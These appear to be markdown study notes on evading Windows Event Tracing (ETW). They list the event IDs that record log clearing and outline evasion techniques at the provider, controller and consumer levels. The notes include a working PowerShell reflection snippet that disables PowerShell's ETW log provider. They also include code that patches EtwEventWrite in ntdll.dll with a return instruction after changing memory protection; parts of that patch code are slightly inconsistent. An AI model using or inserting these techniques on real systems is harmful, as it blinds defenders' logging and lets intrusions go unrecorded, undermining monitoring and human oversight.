# Evade Event Tracing (ETW)

* Event Logging
* Trace Logging
* Event IDs are used
* __Event Provider__ generate events
    * Managed Object Format, enabled by a single trace session
    * Windows Software Trace Preprocessor, Trace Message Format, enabled by a single trace session
    * Manifest Based, up to 8 trace sessions
    * TraceLogging, up to 8 trace sessions
* __Event Controller__ build and configure sessions for events
* __Event Consumer__ interpret events, parses sessions of selected providers
* XML data

## Log Evasion

* Deleting logs is tracked by an event ID as well . Do not do it!
    * ID 1102, security audit logs cleared
    * ID 104, log file cleared
    * ID 1100, even service shut down

### Techniques

* Provider
    * [PSEtwLogProvider modification](https://docs.microsoft.com/en-us/dotnet/standard/assembly/) from .Net assembly
        * Set `m_enabled` to `$null` via powershell script

```sh
$logProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
$etwProvider = $logProvider.GetField('etwProvider','NonPublic,Static').GetValue($null)
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0);
```

    * Group policy takeover
        * Loaded in the same security context as the user
        * GPO providers are script block logging and module logging
        * Event IDs reported are `4103` (Logs command invocation) and `4104` (Logs script block execution)
        * Administrative Templates -> Windows Components -> Windows PowerShell
    * Log pipeline abuse
        * `LogPipelineExecutionDetails` has to be set to false
    * Type creation
*  Controller
    * Patching EtwEventWrite stored in `ntdll.dll` via return value modification

```sh
var ntdll = Win32.LoadLibrary("ntdll.dll");
var etwFunction = Win32.GetProcAddress(ntdll, "EtwEventWrite");
```

        * Modify memory permissions

```c
uint oldProtect;
Win32.VirtualProtect(
	etwFunction, 
	(UIntPtr)patch.Length, 
	0x40, 
	out oldProtect
);
```

        * Copy via `Marshal.Copy`

```c
patch(new byte[] { 0xc2, 0x14, 0x00 });
Marshal.Copy(
	patch, 
	0, 
	etwEventSend, 
	patch.Length
);
```

        * Clean up

```c
VirtualProtect(etwFunction, 4, oldProtect, &oldOldProtect);
```

        * Check patched instruction

```c
Win32.FlushInstructionCache(
	etwFunction,
	NULL
);
```

    * Runtime Trace Tampering
* Consumer
    * Log smashing
    * Log tampering